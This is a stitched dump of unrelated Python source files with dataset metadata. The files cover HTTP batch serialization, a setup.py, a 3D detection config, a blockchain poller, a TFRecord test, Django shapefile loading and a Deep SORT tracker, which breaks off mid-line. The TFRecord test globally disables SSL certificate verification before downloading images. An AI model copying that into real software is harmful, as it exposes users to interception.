*headers_raw, content = lines[1:]
content = json.loads(content)
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": content
}
@staticmethod
def _serialize_request(request):
eol = "\r\n"
method = request.method
if "X-HTTP-Method" in request.headers:
method = request.headers["X-HTTP-Method"]
lines = ["{method} {url} HTTP/1.1".format(method=method, url=request.url),
*[':'.join(h) for h in request.headers.items()]]
if request.data:
lines.append(eol)
lines.append(json.dumps(request.data))
buffer = eol + eol.join(lines) + eol
payload = buffer.encode('utf-8').lstrip()
message = Message()
message.add_header("Content-Type", "application/http")
message.add_header("Content-Transfer-Encoding", "binary")
message.set_payload(payload)
return message
| true
| true
|
f707990f74ebda389b8ac9fa17579186b3bc2ac7
| 1,945
|
py
|
Python
|
setup.py
|
rec/streamy
|
1db04d87b2bed4cfbcd653213033ec3c66ed5b9e
|
[
"MIT"
] | 1
|
2019-05-26T15:10:26.000Z
|
2019-05-26T15:10:26.000Z
|
setup.py
|
rec/streamy
|
1db04d87b2bed4cfbcd653213033ec3c66ed5b9e
|
[
"MIT"
] | null | null | null |
setup.py
|
rec/streamy
|
1db04d87b2bed4cfbcd653213033ec3c66ed5b9e
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import os, sys
# From here: http://pytest.org/2.2.4/goodpractises.html
class RunTests(TestCommand):
DIRECTORY = 'test'
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = [self.DIRECTORY]
self.test_suite = True
def run_tests(self):
# Import here, because outside the eggs aren't loaded.
import pytest
errno = pytest.main(self.test_args)
if errno:
raise SystemExit(errno)
def _version():
with open('streamy.py') as fp:
line = next(i for i in fp if i.startswith('__version__'))
return line.strip().split()[-1].strip("'")
NAME = 'streamy'
OWNER = 'timedata-org'
VERSION = _version()
URL = 'http://github.com/{OWNER}/{NAME}'.format(**locals())
DOWNLOAD_URL = '{URL}/archive/{VERSION}.tar.gz'.format(**locals())
if __name__ == '__main__':
setup(
name='streamy',
version=_version(),
description=('streamy splits a stream into a stream of strings that are'
' complete JSON expressions'),
author='Tom Ritchford',
author_email='tom@swirly.com',
url=URL,
download_url=DOWNLOAD_URL,
license='MIT',
packages=find_packages(exclude=['test']),
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
tests_require=[],
cmdclass={'test': RunTests},
keywords=['git', 'import'],
include_package_data=True,
install_requires=[],
)
| 30.390625
| 80
| 0.598458
|
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import os, sys
class RunTests(TestCommand):
DIRECTORY = 'test'
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = [self.DIRECTORY]
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
if errno:
raise SystemExit(errno)
def _version():
with open('streamy.py') as fp:
line = next(i for i in fp if i.startswith('__version__'))
return line.strip().split()[-1].strip("'")
NAME = 'streamy'
OWNER = 'timedata-org'
VERSION = _version()
URL = 'http://github.com/{OWNER}/{NAME}'.format(**locals())
DOWNLOAD_URL = '{URL}/archive/{VERSION}.tar.gz'.format(**locals())
if __name__ == '__main__':
setup(
name='streamy',
version=_version(),
description=('streamy splits a stream into a stream of strings that are'
' complete JSON expressions'),
author='Tom Ritchford',
author_email='tom@swirly.com',
url=URL,
download_url=DOWNLOAD_URL,
license='MIT',
packages=find_packages(exclude=['test']),
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
tests_require=[],
cmdclass={'test': RunTests},
keywords=['git', 'import'],
include_package_data=True,
install_requires=[],
)
| true
| true
|
f7079b75ade620f03f918b382e39e44f8ce865cd
| 3,491
|
py
|
Python
|
configs/_base_/models/hv_second_secfpn_kitti.py
|
ACIS2021/robust-point-clouds
|
127860149d2f4bd2db6ae015af0be132c156dd34
|
[
"Unlicense"
] | null | null | null |
configs/_base_/models/hv_second_secfpn_kitti.py
|
ACIS2021/robust-point-clouds
|
127860149d2f4bd2db6ae015af0be132c156dd34
|
[
"Unlicense"
] | null | null | null |
configs/_base_/models/hv_second_secfpn_kitti.py
|
ACIS2021/robust-point-clouds
|
127860149d2f4bd2db6ae015af0be132c156dd34
|
[
"Unlicense"
] | null | null | null |
voxel_size = [0.05, 0.05, 0.1]
model = dict(
type='VoxelNet',
voxel_layer=dict(max_num_points=5,
point_cloud_range=[0, -40, -3, 70.4, 40, 1],
voxel_size=voxel_size,
max_voxels=(16000, 40000)),
voxel_encoder=dict(type='HardSimpleVFE'),
middle_encoder=dict(type='SparseEncoder',
in_channels=4,
sparse_shape=[41, 1600, 1408],
order=('conv', 'norm', 'act')),
backbone=dict(type='SECOND',
in_channels=256,
layer_nums=[5, 5],
layer_strides=[1, 2],
out_channels=[128, 256]),
neck=dict(type='SECONDFPN',
in_channels=[128, 256],
upsample_strides=[1, 2],
out_channels=[256, 256]),
bbox_head=dict(type='Anchor3DHead',
num_classes=3,
in_channels=512,
feat_channels=512,
use_direction_classifier=True,
anchor_generator=dict(
type='Anchor3DRangeGenerator',
ranges=[
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -1.78, 70.4, 40.0, -1.78],
],
sizes=[[0.6, 0.8, 1.73], [0.6, 1.76, 1.73],
[1.6, 3.9, 1.56]],
rotations=[0, 1.57],
reshape_out=False),
diff_rad_by_sin=True,
bbox_coder=dict(type='DeltaXYZWLHRBBoxCoder'),
loss_cls=dict(type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss',
beta=1.0 / 9.0,
loss_weight=2.0),
loss_dir=dict(type='CrossEntropyLoss',
use_sigmoid=False,
loss_weight=0.2)),
# model training and testing settings
train_cfg=dict(
assigner=[
dict( # for Pedestrian
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Cyclist
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Car
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.6,
neg_iou_thr=0.45,
min_pos_iou=0.45,
ignore_iof_thr=-1),
],
allowed_border=0,
pos_weight=-1,
debug=False),
test_cfg=dict(use_rotate_nms=True,
nms_across_levels=False,
nms_thr=0.01,
score_thr=0.1,
min_bbox_size=0,
nms_pre=100,
max_num=50))
| 40.126437
| 66
| 0.42452
|
voxel_size = [0.05, 0.05, 0.1]
model = dict(
type='VoxelNet',
voxel_layer=dict(max_num_points=5,
point_cloud_range=[0, -40, -3, 70.4, 40, 1],
voxel_size=voxel_size,
max_voxels=(16000, 40000)),
voxel_encoder=dict(type='HardSimpleVFE'),
middle_encoder=dict(type='SparseEncoder',
in_channels=4,
sparse_shape=[41, 1600, 1408],
order=('conv', 'norm', 'act')),
backbone=dict(type='SECOND',
in_channels=256,
layer_nums=[5, 5],
layer_strides=[1, 2],
out_channels=[128, 256]),
neck=dict(type='SECONDFPN',
in_channels=[128, 256],
upsample_strides=[1, 2],
out_channels=[256, 256]),
bbox_head=dict(type='Anchor3DHead',
num_classes=3,
in_channels=512,
feat_channels=512,
use_direction_classifier=True,
anchor_generator=dict(
type='Anchor3DRangeGenerator',
ranges=[
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -1.78, 70.4, 40.0, -1.78],
],
sizes=[[0.6, 0.8, 1.73], [0.6, 1.76, 1.73],
[1.6, 3.9, 1.56]],
rotations=[0, 1.57],
reshape_out=False),
diff_rad_by_sin=True,
bbox_coder=dict(type='DeltaXYZWLHRBBoxCoder'),
loss_cls=dict(type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss',
beta=1.0 / 9.0,
loss_weight=2.0),
loss_dir=dict(type='CrossEntropyLoss',
use_sigmoid=False,
loss_weight=0.2)),
train_cfg=dict(
assigner=[
dict( type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.6,
neg_iou_thr=0.45,
min_pos_iou=0.45,
ignore_iof_thr=-1),
],
allowed_border=0,
pos_weight=-1,
debug=False),
test_cfg=dict(use_rotate_nms=True,
nms_across_levels=False,
nms_thr=0.01,
score_thr=0.1,
min_bbox_size=0,
nms_pre=100,
max_num=50))
| true
| true
|
f7079bdf572c6fb25d68de3ac7e2a061d2d86ca1
| 761
|
py
|
Python
|
pycspr/api/get_switch_block.py
|
momipsl/pycspr
|
82c1ca003525a3d205d2aa3b7da5d1ecd275e9b5
|
[
"Apache-2.0"
] | 2
|
2021-04-14T13:49:20.000Z
|
2021-07-06T22:07:02.000Z
|
pycspr/api/get_switch_block.py
|
momipsl/pycspr
|
82c1ca003525a3d205d2aa3b7da5d1ecd275e9b5
|
[
"Apache-2.0"
] | null | null | null |
pycspr/api/get_switch_block.py
|
momipsl/pycspr
|
82c1ca003525a3d205d2aa3b7da5d1ecd275e9b5
|
[
"Apache-2.0"
] | 1
|
2021-04-15T12:52:42.000Z
|
2021-04-15T12:52:42.000Z
|
import time
from pycspr.api.get_block import execute as get_block
def execute(
polling_interval_seconds: float = 1.0,
max_polling_time_seconds: float = 120.0
) -> dict:
"""Returns last finialised block in current era.
:param polling_interval_seconds: Time interval time (in seconds) before polling for next switch block.
:param max_polling_time_seconds: Maximum time in seconds to poll.
:returns: On-chain block information.
"""
elapsed = 0.0
while True:
block = get_block()
if block["header"]["era_end"] is not None:
return block
elapsed += polling_interval_seconds
if elapsed > max_polling_time_seconds:
break
time.sleep(polling_interval_seconds)
| 26.241379
| 106
| 0.678055
|
import time
from pycspr.api.get_block import execute as get_block
def execute(
polling_interval_seconds: float = 1.0,
max_polling_time_seconds: float = 120.0
) -> dict:
elapsed = 0.0
while True:
block = get_block()
if block["header"]["era_end"] is not None:
return block
elapsed += polling_interval_seconds
if elapsed > max_polling_time_seconds:
break
time.sleep(polling_interval_seconds)
| true
| true
|
f7079e13e136fd4466c5ea492de342e7668711ba
| 9,382
|
py
|
Python
|
texar/tf/data/data/tfrecord_data_test.py
|
GingerBear/texar
|
46e006f9349893a3015cd937bee9914c516e26af
|
[
"Apache-2.0"
] | 1
|
2019-08-14T02:54:45.000Z
|
2019-08-14T02:54:45.000Z
|
texar/tf/data/data/tfrecord_data_test.py
|
GingerBear/texar
|
46e006f9349893a3015cd937bee9914c516e26af
|
[
"Apache-2.0"
] | null | null | null |
texar/tf/data/data/tfrecord_data_test.py
|
GingerBear/texar
|
46e006f9349893a3015cd937bee9914c516e26af
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
"""
Unit tests for data related operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import copy
import shutil
import tempfile
import ssl
import tensorflow as tf
import texar.tf as tx
ssl._create_default_https_context = ssl._create_unverified_context
class TFRecordDataTest(tf.test.TestCase):
"""Tests tfrecord data class.
"""
# pylint: disable=too-many-locals
def setUp(self):
tf.test.TestCase.setUp(self)
# Create test data
# pylint: disable=no-member
self._test_dir = tempfile.mkdtemp()
cat_in_snow = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'cat_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/320px-Felis_catus-cat_on_snow.jpg')
williamsburg_bridge = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'bridge_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/194px-New_East_River_Bridge_from_Brooklyn_'
'det.4a09796u.jpg')
def _bytes_feature(value=None):
"""Returns a bytes_list from a string / byte.
"""
# pylint: disable=undefined-loop-variable
value = tf.compat.as_bytes(
value,
encoding='utf-8'
)
return tf.train.Feature(
bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value=None):
"""Returns an int64_list from a bool / enum / int / uint.
"""
return tf.train.Feature(
int64_list=tf.train.Int64List(value=[value]))
_feature_original_types = {
'height': ['tf.int64', 'FixedLenFeature'],
'width': ['tf.int64', 'FixedLenFeature'],
'label': ['tf.int64', 'FixedLenFeature'],
'shape': [tf.int64, 'VarLenFeature'],
'image_raw': ['tf.string', 'FixedLenFeature'],
'variable1': [tf.string, 'FixedLenFeature'],
'variable2': ['tf.int64', 'FixedLenFeature'],
}
self._feature_convert_types = {
'variable1': 'tf.float32',
'variable2': 'tf.string',
}
_image_options = {}
self._unconvert_features = ['height', 'width', 'label']
def _image_example(image_string, image_shape, label):
"""Create data example with image
"""
feature = {
'height': _int64_feature(image_shape[0]),
'width': _int64_feature(image_shape[1]),
'shape': tf.train.Feature(
int64_list=tf.train.Int64List(value=list(image_shape))),
'label': _int64_feature(label),
'image_raw': _bytes_feature(image_string),
'variable1': _bytes_feature('1234567890'),
'variable2': _int64_feature(9876543210),
}
return tf.train.Example(
features=tf.train.Features(feature=feature))
self._dataset_valid = {
'height': [],
'width': [],
'shape': [],
'label': [],
'image_raw': [],
'variable1': [],
'variable2': [],
}
_toy_image_labels_valid = {
cat_in_snow : 0,
williamsburg_bridge : 1,
}
_toy_image_shapes = {
cat_in_snow: (213, 320, 3),
williamsburg_bridge: (239, 194),
}
_tfrecord_filepath = os.path.join(
self._test_dir,
'test.tfrecord')
# Prepare Validation data
with tf.python_io.TFRecordWriter(_tfrecord_filepath) as writer:
for image_path, label in _toy_image_labels_valid.items():
with open(image_path, 'rb') as fid:
image_data = fid.read()
image_shape = _toy_image_shapes[image_path]
tf_example = _image_example(image_data, image_shape, label)
writer.write(tf_example.SerializeToString())
#_construct_dataset_valid("", shape, label)
single_data = {
'height': image_shape[0],
'width': image_shape[1],
'shape': image_shape,
'label': label,
'image_raw': image_data,
'variable1': "1234567890",
'variable2': int(9876543210),
}
for key, value in single_data.items():
self._dataset_valid[key].append(value)
self._hparams = {
"num_epochs": 1,
"batch_size": 1,
"shuffle": False,
"dataset": {
"files": _tfrecord_filepath,
"feature_original_types": _feature_original_types,
"feature_convert_types": self._feature_convert_types,
"image_options": [_image_options],
}
}
def tearDown(self):
"""Remove the downloaded files after the test
"""
shutil.rmtree(self._test_dir)
def _run_and_test(self, hparams):
# Construct database
tfrecord_data = tx.data.TFRecordData(hparams)
iterator = tfrecord_data.dataset.make_initializable_iterator()
data_batch = iterator.get_next()
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
sess.run(tf.tables_initializer())
sess.run(iterator.initializer)
i = 0
def _prod(lst):
res = 1
for i in lst:
res *= i
return res
while True:
try:
# Run the logics
data_batch_ = sess.run(data_batch)
self.assertEqual(
set(data_batch_.keys()),
set(tfrecord_data.list_items()))
# Check data consistency
for key in self._unconvert_features:
value = data_batch_[key][0]
self.assertEqual(value, self._dataset_valid[key][i])
self.assertEqual(
list(data_batch_['shape'].values),
list(self._dataset_valid['shape'][i]))
# Check data type conversion
for key, item in self._feature_convert_types.items():
value = data_batch_[key][0]
if item == 'tf.string' or item is tf.string:
self.assertTrue(isinstance(value, bytes))
else:
dtype_matched = (
tx.utils.dtypes.get_tf_dtype(str(value.dtype))
is tx.utils.dtypes.get_tf_dtype(item))
self.assertTrue(dtype_matched)
# Check image decoding and resize
if hparams["dataset"].get("image_options"):
image_options = hparams["dataset"].get("image_options")
if isinstance(image_options, dict):
image_options = [image_options]
for image_option_feature in image_options:
image_key = image_option_feature.get(
"image_feature_name")
if image_key is None:
continue
image_gen = data_batch_[image_key][0]
image_valid_shape = self._dataset_valid["shape"][i]
resize_height = image_option_feature.get(
"resize_height")
resize_width = image_option_feature.get(
"resize_width")
if resize_height and resize_width:
self.assertEqual(
image_gen.shape[0] * image_gen.shape[1],
resize_height * resize_width)
else:
self.assertEqual(
_prod(image_gen.shape),
_prod(image_valid_shape))
i += 1
except tf.errors.OutOfRangeError:
print('Done -- epoch limit reached')
break
def test_default_setting(self):
"""Tests the logics of TFRecordData.
"""
self._run_and_test(self._hparams)
def test_image_resize(self):
"""Tests the image resize function
"""
hparams = copy.copy(self._hparams)
_image_options = {
'image_feature_name': 'image_raw',
'resize_height': 512,
'resize_width': 512,
}
hparams["dataset"].update({"image_options": _image_options})
self._run_and_test(hparams)
if __name__ == "__main__":
tf.test.main()
| 37.983806
| 79
| 0.513537
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import copy
import shutil
import tempfile
import ssl
import tensorflow as tf
import texar.tf as tx
ssl._create_default_https_context = ssl._create_unverified_context
class TFRecordDataTest(tf.test.TestCase):
def setUp(self):
tf.test.TestCase.setUp(self)
self._test_dir = tempfile.mkdtemp()
cat_in_snow = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'cat_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/320px-Felis_catus-cat_on_snow.jpg')
williamsburg_bridge = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'bridge_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/194px-New_East_River_Bridge_from_Brooklyn_'
'det.4a09796u.jpg')
def _bytes_feature(value=None):
value = tf.compat.as_bytes(
value,
encoding='utf-8'
)
return tf.train.Feature(
bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value=None):
return tf.train.Feature(
int64_list=tf.train.Int64List(value=[value]))
_feature_original_types = {
'height': ['tf.int64', 'FixedLenFeature'],
'width': ['tf.int64', 'FixedLenFeature'],
'label': ['tf.int64', 'FixedLenFeature'],
'shape': [tf.int64, 'VarLenFeature'],
'image_raw': ['tf.string', 'FixedLenFeature'],
'variable1': [tf.string, 'FixedLenFeature'],
'variable2': ['tf.int64', 'FixedLenFeature'],
}
self._feature_convert_types = {
'variable1': 'tf.float32',
'variable2': 'tf.string',
}
_image_options = {}
self._unconvert_features = ['height', 'width', 'label']
def _image_example(image_string, image_shape, label):
feature = {
'height': _int64_feature(image_shape[0]),
'width': _int64_feature(image_shape[1]),
'shape': tf.train.Feature(
int64_list=tf.train.Int64List(value=list(image_shape))),
'label': _int64_feature(label),
'image_raw': _bytes_feature(image_string),
'variable1': _bytes_feature('1234567890'),
'variable2': _int64_feature(9876543210),
}
return tf.train.Example(
features=tf.train.Features(feature=feature))
self._dataset_valid = {
'height': [],
'width': [],
'shape': [],
'label': [],
'image_raw': [],
'variable1': [],
'variable2': [],
}
_toy_image_labels_valid = {
cat_in_snow : 0,
williamsburg_bridge : 1,
}
_toy_image_shapes = {
cat_in_snow: (213, 320, 3),
williamsburg_bridge: (239, 194),
}
_tfrecord_filepath = os.path.join(
self._test_dir,
'test.tfrecord')
with tf.python_io.TFRecordWriter(_tfrecord_filepath) as writer:
for image_path, label in _toy_image_labels_valid.items():
with open(image_path, 'rb') as fid:
image_data = fid.read()
image_shape = _toy_image_shapes[image_path]
tf_example = _image_example(image_data, image_shape, label)
writer.write(tf_example.SerializeToString())
single_data = {
'height': image_shape[0],
'width': image_shape[1],
'shape': image_shape,
'label': label,
'image_raw': image_data,
'variable1': "1234567890",
'variable2': int(9876543210),
}
for key, value in single_data.items():
self._dataset_valid[key].append(value)
self._hparams = {
"num_epochs": 1,
"batch_size": 1,
"shuffle": False,
"dataset": {
"files": _tfrecord_filepath,
"feature_original_types": _feature_original_types,
"feature_convert_types": self._feature_convert_types,
"image_options": [_image_options],
}
}
def tearDown(self):
shutil.rmtree(self._test_dir)
def _run_and_test(self, hparams):
tfrecord_data = tx.data.TFRecordData(hparams)
iterator = tfrecord_data.dataset.make_initializable_iterator()
data_batch = iterator.get_next()
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
sess.run(tf.tables_initializer())
sess.run(iterator.initializer)
i = 0
def _prod(lst):
res = 1
for i in lst:
res *= i
return res
while True:
try:
data_batch_ = sess.run(data_batch)
self.assertEqual(
set(data_batch_.keys()),
set(tfrecord_data.list_items()))
for key in self._unconvert_features:
value = data_batch_[key][0]
self.assertEqual(value, self._dataset_valid[key][i])
self.assertEqual(
list(data_batch_['shape'].values),
list(self._dataset_valid['shape'][i]))
for key, item in self._feature_convert_types.items():
value = data_batch_[key][0]
if item == 'tf.string' or item is tf.string:
self.assertTrue(isinstance(value, bytes))
else:
dtype_matched = (
tx.utils.dtypes.get_tf_dtype(str(value.dtype))
is tx.utils.dtypes.get_tf_dtype(item))
self.assertTrue(dtype_matched)
if hparams["dataset"].get("image_options"):
image_options = hparams["dataset"].get("image_options")
if isinstance(image_options, dict):
image_options = [image_options]
for image_option_feature in image_options:
image_key = image_option_feature.get(
"image_feature_name")
if image_key is None:
continue
image_gen = data_batch_[image_key][0]
image_valid_shape = self._dataset_valid["shape"][i]
resize_height = image_option_feature.get(
"resize_height")
resize_width = image_option_feature.get(
"resize_width")
if resize_height and resize_width:
self.assertEqual(
image_gen.shape[0] * image_gen.shape[1],
resize_height * resize_width)
else:
self.assertEqual(
_prod(image_gen.shape),
_prod(image_valid_shape))
i += 1
except tf.errors.OutOfRangeError:
print('Done -- epoch limit reached')
break
def test_default_setting(self):
self._run_and_test(self._hparams)
def test_image_resize(self):
hparams = copy.copy(self._hparams)
_image_options = {
'image_feature_name': 'image_raw',
'resize_height': 512,
'resize_width': 512,
}
hparams["dataset"].update({"image_options": _image_options})
self._run_and_test(hparams)
if __name__ == "__main__":
tf.test.main()
| true
| true
|
f7079e7234b39fe9146d60409999798817582d7d
| 566
|
py
|
Python
|
PythonBasics/NestedLoops/Exercise/train_trainers.py
|
achoraev/SoftUni
|
0cc7db470a096cc33bbe0ca6bd90060b79120573
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/NestedLoops/Exercise/train_trainers.py
|
achoraev/SoftUni
|
0cc7db470a096cc33bbe0ca6bd90060b79120573
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/NestedLoops/Exercise/train_trainers.py
|
achoraev/SoftUni
|
0cc7db470a096cc33bbe0ca6bd90060b79120573
|
[
"Apache-2.0"
] | null | null | null |
people = int(input())
presentation = ""
total_score = 0
total_average = 0
count_presentation = 0
while True:
command = input()
if command == "Finish":
break
presentation = command
score = 0
count_presentation += 1
for i in range(0, people):
score += float(input())
average_score = score / people
total_score += average_score
print(f"{presentation} - {average_score:.2f}.")
total_average = total_score / count_presentation
print(f"Student's final assessment is {total_average:.2f}.")
| 21.769231
| 61
| 0.632509
|
people = int(input())
presentation = ""
total_score = 0
total_average = 0
count_presentation = 0
while True:
command = input()
if command == "Finish":
break
presentation = command
score = 0
count_presentation += 1
for i in range(0, people):
score += float(input())
average_score = score / people
total_score += average_score
print(f"{presentation} - {average_score:.2f}.")
total_average = total_score / count_presentation
print(f"Student's final assessment is {total_average:.2f}.")
| true
| true
|
f7079eef1bd564c94d8e1deac535192b60d263c4
| 481
|
py
|
Python
|
liveapp/loadtowns.py
|
derrick-gopher/livestockapp
|
87d4b0a697e0c47e64d419c61141b9fe04dbf088
|
[
"MIT"
] | 1
|
2018-05-22T18:42:58.000Z
|
2018-05-22T18:42:58.000Z
|
liveapp/loadtowns.py
|
muriithiderro/livestockapp
|
87d4b0a697e0c47e64d419c61141b9fe04dbf088
|
[
"MIT"
] | 7
|
2020-06-05T17:45:19.000Z
|
2022-01-13T00:41:59.000Z
|
liveapp/loadtowns.py
|
muriithiderro/livestockapp
|
87d4b0a697e0c47e64d419c61141b9fe04dbf088
|
[
"MIT"
] | 1
|
2020-01-12T21:09:51.000Z
|
2020-01-12T21:09:51.000Z
|
import os
from django.contrib.gis.utils import LayerMapping
from liveapp.models import Town
town_mapping = {
'town_name': 'Town_Name',
'town_type': 'Town_Type',
'geom': 'MULTIPOINT',
}
town_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), 'data/subcounty', 'towns.shp'),)
def run(verbose=True):
lm = LayerMapping(
Town, town_shp, town_mapping,
transform=False, encoding='iso-8859-1',
)
lm.save(strict=True, verbose=verbose)
| 24.05
| 99
| 0.681913
|
import os
from django.contrib.gis.utils import LayerMapping
from liveapp.models import Town
town_mapping = {
'town_name': 'Town_Name',
'town_type': 'Town_Type',
'geom': 'MULTIPOINT',
}
town_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), 'data/subcounty', 'towns.shp'),)
def run(verbose=True):
lm = LayerMapping(
Town, town_shp, town_mapping,
transform=False, encoding='iso-8859-1',
)
lm.save(strict=True, verbose=verbose)
| true
| true
|
f7079f6f7700b22cd843843d2cee903b1f3ed3c2
| 295
|
py
|
Python
|
straitlets/dispatch.py
|
quantopian/serializable-traitlets
|
f7de75507978e08446a15894a8417997940ea7a6
|
[
"Apache-2.0"
] | 13
|
2016-01-27T01:55:18.000Z
|
2022-02-10T12:09:46.000Z
|
straitlets/dispatch.py
|
quantopian/serializable-traitlets
|
f7de75507978e08446a15894a8417997940ea7a6
|
[
"Apache-2.0"
] | 5
|
2016-02-17T13:52:50.000Z
|
2018-12-13T21:30:26.000Z
|
straitlets/dispatch.py
|
quantopian/serializable-traitlets
|
f7de75507978e08446a15894a8417997940ea7a6
|
[
"Apache-2.0"
] | 10
|
2017-07-21T14:27:17.000Z
|
2022-03-16T11:19:47.000Z
|
"""
Python <= 3.4 compat for singledispatch.
"""
from sys import version_info
if (version_info.major, version_info.minor) < (3, 4): # pragma: no cover
from singledispatch import singledispatch
else: # pragma: no cover
from functools import singledispatch
__all__ = ['singledispatch']
| 26.818182
| 73
| 0.732203
|
from sys import version_info
if (version_info.major, version_info.minor) < (3, 4): from singledispatch import singledispatch
else: from functools import singledispatch
__all__ = ['singledispatch']
| true
| true
|
f707a04c0a3ba2c575c9cf5566717a283e97e9d4
| 5,489
|
py
|
Python
|
deep_sort/sort/tracker.py
|
Jeasonlee313/paperdev_Phy_SORT-
|
24c9ee5d3fc18ed6d3d85e4f95195d39bdf527e2
|
[
"MIT"
] | null | null | null |
deep_sort/sort/tracker.py
|
Jeasonlee313/paperdev_Phy_SORT-
|
24c9ee5d3fc18ed6d3d85e4f95195d39bdf527e2
|
[
"MIT"
] | null | null | null |
deep_sort/sort/tracker.py
|
Jeasonlee313/paperdev_Phy_SORT-
|
24c9ee5d3fc18ed6d3d85e4f95195d39bdf527e2
|
[
"MIT"
] | null | null | null |
# vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
"""
This is the multi-target tracker.
Parameters
----------
metric : nn_matching.NearestNeighborDistanceMetric
A distance metric for measurement-to-track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
Attributes
----------
metric : nn_matching.NearestNeighborDistanceMetric
The distance metric used for measurement to track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of frames that a track remains in initialization phase.
kf : kalman_filter.KalmanFilter
A Kalman filter to filter target trajectories in image space.
tracks : List[Track]
The list of active tracks at the current time step.
"""
def __init__(self, metric, max_iou_distance=0.7, max_age=70, n_init=3, h = np.identity(3, float)):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
self.H = h
def predict(self):
"""Propagate track state distributions one time step forward.
This function should be called once every time step, before `update`.
"""
for track in self.tracks:
track.predict(self.kf)
def update(self, detections, h=np.identity(3)):
"""Perform measurement update and track management.
Parameters
----------
detections : List[deep_sort.detection.Detection]
A list of detections at the current time step.
"""
# Run matching cascade.
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
# Update track set.
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
self.kf, detections[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx])
self.tracks = [t for t in self.tracks if not t.is_deleted()]
# Update distance metric.
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
track.features = []
self.metric.partial_fit(
np.asarray(features), np.asarray(targets), active_targets)
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
print("cost_matrix1:\n", cost_matrix)
cost_matrix = linear_assignment.gate_cost_matrix(
self.kf, cost_matrix, tracks, dets, track_indices,
detection_indices, only_position=True)
print("cost_matrix2:\n", cost_matrix)
return cost_matrix
# Split track set into confirmed and unconfirmed tracks.
confirmed_tracks = [
